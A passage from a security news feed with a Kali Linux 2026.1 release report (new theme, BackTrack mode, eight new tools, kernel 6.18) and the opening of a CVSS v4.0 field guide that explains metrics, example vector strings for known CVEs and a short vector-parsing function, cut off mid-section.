<content:encoded><![CDATA[<p><img width="1280" height="720" src="https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Kali Linux 2026" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026.jpg 1280w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-300x169.jpg 300w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-1024x576.jpg 1024w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-768x432.jpg 768w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-600x338.jpg 600w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-150x84.jpg 150w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-750x422.jpg 750w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-1140x641.jpg 1140w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026.avif 1280w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-300x169.avif 300w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-1024x576.avif 1024w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-768x432.avif 768w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-600x338.avif 600w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-150x84.avif 150w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-750x422.avif 750w, https://thecyberexpress.com/wp-content/uploads/Kali-Linux-2026-1140x641.avif 1140w" sizes="(max-width: 1280px) 100vw, 1280px" title="Kali Linux 2026.1 Launches with 8 New Tools, UI Refresh, and Kernel Upgrade 1"></p><span data-contrast="auto">Kali Linux continues to evolve as a leading platform for penetration testing, and its latest release, Kali Linux 2026.1, introduces a mix of visual updates, new tools, and system-level improvements. This release not only refines the user experience but also pays tribute to its roots in BackTrack, marking a significant milestone in the project’s history.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">As with previous annual releases, Kali Linux 2026.1 arrives with a complete visual refresh. The updated theme spans across the entire user interface, including the boot menu, installer, login screen, and desktop environment. </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">New wallpapers have also been added, ensuring a modern and consistent aesthetic. The Kali Purple variant, designed for defensive <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="27265">security</a> workflows, receives its own updated artwork as part of this overhaul.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">A Refreshed Look in Kali Linux 2026.1</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">In addition to visual changes, the <a href="https://www.kali.org/blog/kali-linux-2026-1-release/" target="_blank" rel="nofollow noopener">development team addressed a long-standing issue</a> with the boot animation in live images. Earlier versions displayed only part of the animation, often appearing stuck at the beginning. With this release, the animation plays correctly and </span><span data-contrast="auto">loops seamlessly if the boot process takes longer than expected.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">One of the most notable additions in Kali Linux 2026.1 is the introduction of a BackTrack-inspired mode within the kali-undercover tool. This feature commemorates the 20th anniversary of BackTrack Linux, the predecessor to Kali.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The BackTrack mode recreates the look and feel of BackTrack 5, including its original wallpaper, color scheme, and window styling. Users can activate it through the system menu or by running the command:</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<blockquote><span data-contrast="auto">kali-undercover --backtrack</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span></blockquote>
<span data-contrast="auto">The mode can be toggled off by executing the same command again, restoring the default Kali interface. This addition blends nostalgia with functionality, allowing long-time users to revisit the environment that laid the groundwork for modern <a href="https://thecyberexpress.com/what-is-penetration-testing/" target="_blank" rel="noopener">penetration testing</a> distributions.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">Eight New Tools Expand Capabilities</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h3>
<span data-contrast="auto">The release introduces eight new tools to the Kali repositories, further enhancing its utility for <a href="https://thecyberexpress.com/the-travel-professionals-data-breach/" target="_blank" rel="noopener">security professionals</a>. These additions include:</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<ul>
 	<li><b><span data-contrast="auto">AdaptixC2: </span></b><span data-contrast="auto">An</span><span data-contrast="auto"> extensible framework for post-exploitation and adversarial emulation </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">Atomic-Operator: </span></b><span data-contrast="auto">A </span><span data-contrast="auto">tool designed to execute Atomic Red Team tests across multiple operating systems </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">Fluxion: </span></b><span data-contrast="auto">A </span><span data-contrast="auto">platform for security auditing and <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-social-engineering/" target="_blank" rel="noopener" title="social engineering" data-wpil-keyword-link="linked" data-wpil-monitor-id="27267">social engineering</a> research </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">GEF: </span></b><span data-contrast="auto">An</span><span data-contrast="auto"> advanced debugging environment tailored for GDB </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">MetasploitMCP: </span></b><span data-contrast="auto">An</span><span data-contrast="auto"> MCP server integration for Metasploit </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">SSTImap: </span></b><span data-contrast="auto">A</span><span data-contrast="auto">n automated detection tool for server-side template injection <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="27266">vulnerabilities</a> </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">WPProbe: </span></b><span data-contrast="auto">A</span><span data-contrast="auto"> fast enumeration tool for WordPress plugins </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><b><span data-contrast="auto">XSStrike: </span></b><span data-contrast="auto">A </span><span data-contrast="auto">cross-site scripting (XSS) scanner </span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
</ul>
<span data-contrast="auto">Among these, MetasploitMCP stands out for extending Metasploit’s functionality, aligning with ongoing efforts to improve modular and scalable penetration testing workflows.</span>

<span data-contrast="auto">In addition to these tools, the release brings 25 new packages, removes 9 outdated ones, and includes 183 package updates. The Linux kernel has also been upgraded to version 6.18, ensuring better <a href="https://thecyberexpress.com/lighttpd-bug-impacts-end-of-life-products/" target="_blank" rel="noopener">hardware support</a> and performance improvements.</span>
<h3 aria-level="2"><b><span data-contrast="none">Known Issues with SDR Tools</span></b></h3>
<span data-contrast="auto">Despite the advancements, Kali Linux 2026.1 is not without its limitations. Users relying on the kali-tools-sdr metapackage may encounter issues with the GNU Radio ecosystem. Tools such as gr-air-modes and gqrx-sdr are currently broken in this release. The development team has acknowledged these problems and expects to address them in a future update.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The Kali NetHunter platform, which enables penetration testing on mobile devices, also receives <a href="https://thecyberexpress.com/enisa-international-strategy-europe/" target="_blank" rel="noopener">several updates</a>. Bug fixes have been applied to resolve issues with WPS scanning, HID permission handling, and navigation via the back button.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Device-specific improvements are included as well. The Redmi Note 8 now supports a new kernel compatible with Android 16. Meanwhile, the Samsung S10 series benefits from a patch to libnexmonkali, restoring functionality for tools such as reaver, bully, and kismet when using internal wireless firmware in a Kali chroot environment.</span>

<span data-contrast="auto">A development in this release is the introduction of a working wireless injection patch for QCACLD 3.0 hardware. This advancement may enable packet injection capabilities across a wide range of smartphones powered by Qualcomm chipsets, expanding the practical use of NetHunter in real-world testing scenarios.</span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVSS v4.0: The Practical Field Guide for Vulnerability Management]]></title>
<description><![CDATA[From a number that nobody trusts to a tool that changes how you workTable of ContentsIntroduction: CVSS Is a Tool, Not a ScoreWhat Changed in v4.0 — and Why It Mattersv3.1 vs v4.0: Side-by-Side with Real CVEsAnatomy of a CVSS v4.0 Vector StringThe Three Metric Groups ExplainedThe CVSS Lifecycle: ...]]></description>
<link>https://tsecurity.de/de/3379040/hacking/cvss-v40-the-practical-field-guide-for-vulnerability-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3379040/hacking/cvss-v40-the-practical-field-guide-for-vulnerability-management/</guid>
<pubDate>Wed, 25 Mar 2026 08:08:18 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>From a number that nobody trusts to a tool that changes how you work</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B9qDekxyxZ4e_C-SbSYhgw.png"></figure><h3>Table of Contents</h3><ol><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#df46"><strong>Introduction: CVSS Is a Tool, Not a Score</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#cba8"><strong>What Changed in v4.0 — and Why It Matters</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#fa73"><strong>v3.1 vs v4.0: Side-by-Side with Real CVEs</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#54ab"><strong>Anatomy of a CVSS v4.0 Vector String</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#6d4b"><strong>The Three Metric Groups Explained</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#093c"><strong>The CVSS Lifecycle: CVSS-B → CVSS-BT → CVSS-BTE</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#fd22"><strong>A Practical Scoring Workflow: Why Many Teams Go from CVSS-B → CVSS-BE → CVSS-BTE</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#f779"><strong>Threat Metrics in Practice: KEV, EPSS, and Exploit Feeds</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#29f7"><strong>Environmental Metrics: Scoring for Your Environment</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#86e2"><strong>Worked Example 1: CVE-2021–44228 Log4Shell — Score Evolution Over 72 Hours</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#c13d"><strong>Worked Example 2: CVE-2025–32433 Erlang/OTP — From 10.0 to 5.9</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#a85e"><strong>Worked Example 3: Firmware Report — 18 Criticals Become Medium</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#3a97"><strong>Worked Example 4: CitrixBleed, MOVEit, FortiOS — Three Real-World Cases</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#391b"><strong>Industry-Specific Scoring: Healthcare, Finance, OT/ICS</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#391b"><strong>CVSS vs SSVC: When to Use Which</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#8630"><strong>The Practical VM Workflow: From Scanner Output to Prioritized Action</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#885e"><strong>CVSS v4.0 Enrichment Tool</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#4fea"><strong>CVSS as Regulatory Framework: The 5-Phase Maturity Model</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#0e98"><strong>Supplemental Metrics: The Overlooked Context Layer</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#aa55"><strong>The 8 Most Common CVSS Mistakes</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#3b76"><strong>Quick Reference Cheatsheet</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#0a5d"><strong>Tools and Resources</strong></a></li><li><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456#bdbf"><strong>Conclusion</strong></a></li></ol><h3>Introduction: CVSS Is a Tool, Not a Score</h3><p>Every security team has a vulnerability scanner. Every scanner produces a list with numbers. And almost every team treats those numbers as the truth — sorting by score descending, starting at 9.8, working down.</p><p>This is wrong. And CVSS v4.0 was designed to fix it.</p><p>The CVSS SIG (Special Interest Group), which maintains the standard at FIRST.org, makes this point explicitly in the Consumer Implementation Guide: <strong>the Base score is a worst-case estimate for an unmitigated system in a generic environment, produced by a vendor who has never seen your network</strong>. It is a starting point, not an answer.</p><h4>The 3–5% Problem</h4><p>According to CISA and multiple published threat intelligence studies, only <strong>3–5% of published CVEs have a known, functional exploit at any given time</strong>. The Exploit Prediction Scoring System (EPSS), maintained by FIRST.org, corroborates this: the median EPSS score across all published CVEs hovers below 0.05 (5% probability of exploitation within 30 days).</p><p>Yet the default CVSS calculation assumes a mature, weaponized exploit exists for every vulnerability. This means every score you see in your scanner — before you apply Threat and Environmental metrics — is calculated under an assumption that is false for 95–97% of CVEs.</p><h4>The Operational Consequence</h4><p>Consider a mid-size organization’s typical scanner output:</p><pre>Scanner report — typical enterprise environment:<br>  Total CVEs:        847<br>  Critical (9.0+):    94<br>  High (7.0–8.9):    203<br>With Base scores only, approximate remediation timeline:<br>  94 Critical × ~8 hours each = 752 analyst-hours<br>  203 High × ~4 hours each   = 812 analyst-hours<br>With Threat + Environmental enrichment (conservative estimate):<br>  ~5 true Critical (KEV or active exploit, exposed system): 40 hours<br>  ~22 true High (POC exists OR exposure without controls): 88 hours<br>Reduction: from ~1,564 analyst-hours to ~128 analyst-hours<br>- a 92% reduction in wasted effort</pre><p>CVSS v4.0 provides the mechanism to achieve this reduction. This guide shows you exactly how.</p><h3>What Changed in v4.0 — and Why It Matters</h3><p>CVSS v4.0 was released on November 1, 2023. The changes are more significant than any previous version update — v4.0 is effectively a redesign of the impact and temporal models.</p><h4>New Impact Model: Two Systems Instead of One</h4><p>The biggest structural change: CVSS v4.0 separates impact into two systems:</p><p><strong>Vulnerable System</strong> — the component directly compromised by the vulnerability (what the attacker hits first). <strong>Subsequent System</strong> — any system affected as a downstream consequence of exploiting the vulnerable system.</p><p>In v3.x, this distinction was handled through the vague “Scope” metric (Unchanged/Changed). In v4.0, it is explicit and granular:</p><pre>v3.1 impact metrics:<br>  C (Confidentiality): None / Low / High<br>  I (Integrity):       None / Low / High<br>  A (Availability):    None / Low / High<br>  S (Scope):           Unchanged / Changed<br><br>v4.0 impact metrics:<br>  VC (Vulnerable System Confidentiality): None / Low / High<br>  VI (Vulnerable System Integrity):       None / Low / High<br>  VA (Vulnerable System Availability):    None / Low / High<br>  SC (Subsequent System Confidentiality): None / Low / High<br>  SI (Subsequent System Integrity):       None / Low / High<br>  SA (Subsequent System Availability):    None / Low / High</pre><p><strong>Why this matters operationally:</strong> In v3.x, if an SSH daemon vulnerability only affects the single server it runs on, you score it Scope:Unchanged. If it can propagate to a database behind it, Scope:Changed. These two scenarios produced different base scores, but there was no way to capture <em>how much</em> the subsequent system was affected. In v4.0, you can score a vulnerability that fully compromises the immediate system (VC:H/VI:H/VA:H) but has only partial downstream confidentiality impact (SC:L/SI:N/SA:N) — a much more precise description of real-world attack chains.</p><h4>New Metric: Attack Requirements (AT)</h4><p>v4.0 adds <strong>Attack Requirements (AT)</strong> alongside Attack Complexity (AC). These two metrics were previously collapsed into one:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B_wNZ8-J12IGCQN695TVw.png"></figure><p><strong>Real-world example:</strong> <a href="https://nvd.nist.gov/vuln/detail/cve-2022-26134">CVE-2022–26134</a> (Confluence OGNL injection):</p><ul><li>AC:L — exploitation is straightforward, no bypass required</li><li>AT:N — no special deployment preconditions; works against default installations</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9K7ZVsd6Yk6Y8t_cD1XOQQ.png"></figure><p>For <strong>AC:H / AT:N</strong> — a race condition where the attacker must actively win timing, but no special deployment condition is required:</p><p><strong>CVE-2024–6387 (OpenSSH “regreSSHion”)</strong> is a strong example. NVD describes it as a race condition in sshd that an unauthenticated remote attacker may trigger by failing authentication within a set time period. That maps well to <strong>AC:H</strong> because exploitation depends on hitting a narrow timing window, but <strong>AT:N</strong> because the race is part of the vulnerable code path itself, not dependent on a non-default deployment prerequisite.</p><p>Another reasonable example is <strong>CVE-2020–28049 (SDDM)</strong>. NVD states the issue is caused by a race condition during Xauthority file creation, where for a short time an unprivileged local user can connect to the X server before authentication is properly enforced. Again, that is naturally <strong>AC:H</strong> because the attacker must exploit a transient timing window, while <strong>AT:N</strong> fits because the weakness is intrinsic to the vulnerable startup behavior rather than requiring some extra deployment state.</p><p>For <strong>AC:L / AT:P</strong> — exploitation is easy once a particular non-default setup exists, but that setup is itself the precondition:</p><p><strong>CVE-2025–24813 (Apache Tomcat)</strong> is a very clean example. Apache and NVD both state exploitation requires <strong>“writes enabled for the default servlet (disabled by default)”</strong>. Once that condition is present, the exploit path is not about winning a race or overcoming complex defensive mechanics; the main hurdle is that the vulnerable deployment configuration must exist. That makes it a good fit for <strong>AC:L</strong> and <strong>AT:P</strong>.</p><p><strong>CVE-2021–45046 (Log4j 2.15.0)</strong> is another solid example. NVD explicitly says the issue appears only in <strong>certain non-default configurations</strong>, specifically when the logging configuration uses a non-default Pattern Layout with Context Lookup or Thread Context Map patterns. In CVSS v4 terms, that aligns with <strong>AT:P</strong> because the environment must be deployed in that specific way; once it is, the attacker’s path is comparatively straightforward, so <strong>AC:L</strong> is the better fit than AC:H.</p><p>A third example is <strong>Tomcat CGI Servlet RCE on Windows</strong> from the Tomcat security page. Apache states the <strong>CGI Servlet is disabled by default</strong> and the issue is exposed when enableCmdLineArguments is enabled. That is another textbook <strong>AT:P</strong> case: the risky deployment state must be present first.</p><h4>New Threat Metric: Exploit Maturity (E)</h4><p>The old v3.x Temporal metric group is now the <strong>Threat</strong> metric group, containing a single metric: <strong>Exploit Maturity (E)</strong>. The old Remediation Level and Report Confidence metrics were removed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/608/1*Ztb_ZKPbhCx0XKTKyoRmvQ.png"></figure><p><strong>The E:X trap:</strong> When a CVE is published with no Exploit Maturity specified — which is the default from NVD and most scanners — CVSS v4.0 calculates as if E:A. If you have 500 CVEs and never set Exploit Maturity, you are treating all 500 as actively exploited. Setting E:U for CVEs with no exploit evidence is not optimism — it is accuracy.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/587/1*_T8ZhwZzVovfebnNGz6buw.png"></figure><h4>Cleaner Naming: CVSS-B, CVSS-BT, CVSS-BTE</h4><p>v4.0 introduces formal nomenclature for the scoring lifecycle. This naming is important for compliance documentation and vendor communication:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*87hv3fMjAi_z6OEP3aJvMA.png"></figure><h4>Supplemental Metric Group (New)</h4><p>A new optional group of metrics that provide <strong>context without affecting the score</strong>: Safety (S), Automatable (AU), Recovery (R), Value Density (V), Vulnerability Response Effort (RE), Provider Urgency (U). These allow vendors to communicate operational context that the numeric score cannot capture.</p><h3>v3.1 vs v4.0: Side-by-Side with Real CVEs</h3><p>Understanding the practical differences requires seeing the same vulnerability scored under both versions.</p><h4>Example A: Log4Shell (CVE-2021–44228)</h4><pre>CVSS v3.1 vector:<br>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H<br>Score: 10.0 Critical<br>CVSS v4.0 equivalent:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Score: 10.0 Critical<br>What changed: The "Scope:Changed" in v3.1 is now explicit as SC:H/SI:H/SA:H.<br>In v4.0, you can see exactly what the downstream impact is, not just that scope<br>"changed". Both scores are 10.0 - the difference is expressiveness.</pre><h4>Example B: PrintNightmare (CVE-2021–34527) — Where Scoring Complexity Matters</h4><pre>CVSS v3.1:<br>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br>Score: 8.8 High<br>CVSS v4.0:<br>CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H<br>Score: 9.8 Critical<br>Key difference: v4.0 scores the DOMAIN CONTROLLER scenario higher because<br>SC:H/SI:H/SA:H explicitly captures that compromising a domain-joined system<br>enables domain-level compromise (subsequent system impact).<br>In v3.1, Scope:Unchanged kept it at 8.8. In v4.0, if the subsequent system<br>(Active Directory) has high CIA impact, the score correctly reflects that<br>a low-privilege exploit can ultimately lead to domain domination.</pre><h4>Example C: A Local Privilege Escalation — Where v4.0 Scores Lower</h4><pre>Vulnerability: Local service running as SYSTEM, exploitable by authenticated user<br>No network access, no subsequent system impact.<br>CVSS v3.1:<br>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br>Score: 7.8 High<br>CVSS v4.0:<br>CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N<br>Score: 7.3 High<br>v4.0 is more accurate: SC:N/SI:N/SA:N explicitly states that no downstream<br>systems are affected. This is a pure local privilege escalation with no<br>lateral movement potential.</pre><h4>Key Scoring Differences Summary</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AeDfapt_NtvpGxFSIhyIGg.png"></figure><h3>Anatomy of a CVSS v4.0 Vector String</h3><p>The vector string is the machine-readable representation of all CVSS metric choices. It is the authoritative record of a vulnerability’s scoring.</p><h4>Full v4.0 Vector String Format</h4><pre>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H</pre><p>Breaking it down:</p><pre>CVSS:4.0          — version identifier (required prefix)<br>BASE METRICS (all 11 required - no omissions allowed):<br>  AV:N            - Attack Vector: Network (remotely exploitable)<br>  AC:L            - Attack Complexity: Low (straightforward)<br>  AT:N            - Attack Requirements: None (no preconditions)<br>  PR:N            - Privileges Required: None (unauthenticated)<br>  UI:N            - User Interaction: None (attacker acts alone)<br>  VC:H            - Vulnerable System Confidentiality: High (full disclosure)<br>  VI:H            - Vulnerable System Integrity: High (full modification)<br>  VA:H            - Vulnerable System Availability: High (full disruption)<br>  SC:H            - Subsequent System Confidentiality: High<br>  SI:H            - Subsequent System Integrity: High<br>  SA:H            - Subsequent System Availability: High<br>THREAT METRICS (optional - defaults to X which assumes A):<br>  E:A             - Exploit Maturity: Attacked (actively exploited)<br>ENVIRONMENTAL METRICS (optional - all default to X):<br>  CR:X / IR:X / AR:X  - Security Requirements (not defined = use vendor defaults)<br>  MAV:A           - Modified Attack Vector: Adjacent (overrides AV:N)<br>  MAC:H           - Modified Attack Complexity: High (compensating controls)<br>  MAT:X           - Modified Attack Requirements: Not Defined<br>  MPR:X           - Modified Privileges Required: Not Defined<br>  MUI:X           - Modified User Interaction: Not Defined<br>  MVC:X / MVI:X / MVA:X   - Modified Vulnerable System impact<br>  MSC:X / MSI:X / MSA:X   - Modified Subsequent System impact<br>SUPPLEMENTAL METRICS (optional - informational, no score effect):<br>  S:X             - Safety<br>  AU:Y            - Automatable: Yes<br>  R:X             - Recovery<br>  V:X             - Value Density<br>  RE:X            - Vulnerability Response Effort<br>  U:X             - Provider Urgency</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*90fOtR4kz1tjbBgJ5z-2rw.png"></figure><h4>Compact Form — Only Non-Default Values</h4><p>In practice, only include metrics that differ from “Not Defined” (X). A fully enriched vector for an isolated internal system with POC exploit:</p><pre>CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/MAV:A/MAC:H</pre><p>The base metrics (all 11) are always required. Everything after that is optional and only included when set.</p><h4>Parsing the Vector Programmatically</h4><pre>def parse_cvss_v4_vector(vector: str) -&gt; dict:<br>    """Parse a CVSS v4.0 vector string into a dictionary."""<br>    if not vector.startswith("CVSS:4.0/"):<br>        raise ValueError("Not a CVSS v4.0 vector")<br>parts = vector[9:].split("/")<br>    metrics = {}<br>    for part in parts:<br>        if ":" in part:<br>            key, value = part.split(":", 1)<br>            metrics[key] = value<br>    return metrics<br># Example usage:<br>vector = "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/MAV:A"<br>parsed = parse_cvss_v4_vector(vector)<br># {'AV': 'N', 'AC': 'L', 'AT': 'N', 'PR': 'N', 'UI': 'N',<br>#  'VC': 'H', 'VI': 'H', 'VA': 'H', 'SC': 'H', 'SI': 'H', 'SA': 'H',<br>#  'E': 'P', 'MAV': 'A'}<br>exploit_maturity = parsed.get("E", "X")  # X = Not Defined (defaults to A)<br>attack_vector = parsed.get("MAV", parsed.get("AV"))  # Modified overrides Base</pre><h4>The Calculator</h4><p>The FIRST.org calculator at <a href="https://www.first.org/cvss/calculator/4.0">https://www.first.org/cvss/calculator/4-0</a> provides a visual interface. As you make selections, the vector string updates in real-time. Use the vector string as the authoritative record; use the calculator as the working interface.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BvpO2M7UW1eqiQnRJsnzug.png"></figure><h3>The Three Metric Groups Explained</h3><h4>Group 1: Base Metrics (Set by Vendor)</h4><p>Base metrics describe the intrinsic properties of the vulnerability itself, independent of time and environment.</p><p><strong>Exploitability Metrics — describe the attack path:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DpPm8CoS6x5CsUHC_ADcdQ.png"></figure><p><strong>Impact Metrics — what happens after a successful exploit:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ysB7U2l00IjRQCn4bobLrg.png"></figure><p><strong>Score Ranges (v4.0):</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9qLA02caf-NTGxC19_5VrA.png"></figure><h4>Group 2: Threat Metrics (Consumer + Threat Intel)</h4><p>Contains one metric: <strong>Exploit Maturity (E)</strong>.</p><p><strong>The most impactful single adjustment available.</strong> Setting E:U for a CVE with no public exploit can drop a 10.0 Critical to a 6–7 Medium/High — moving it from a 3am emergency to a scheduled maintenance window.</p><p><strong>Primary sources for Exploit Maturity determination:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vw79R12dK72SrGCLz3mZtg.png"></figure><ul><li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA Known Exploited Vulnerabilities (KEV) Catalog</a></li><li><a href="https://www.first.org/epss/">FIRST.org Exploit Prediction Scoring System (EPSS)</a></li><li><a href="https://www.rapid7.com/products/metasploit/">Metasploit Framework</a></li><li><a href="https://www.exploit-db.com/">Exploit Database (ExploitDB)</a></li><li>GitHub Public Repositories (Search for CVE IDs directly)</li><li>Commercial Threat Intelligence (TI): Consult Recorded Future, Mandiant, or GreyNoise directly.</li></ul><h4>Group 3: Environmental Metrics (Consumer + Local Knowledge)</h4><p>Two sub-groups that let you encode what your security team knows about the actual 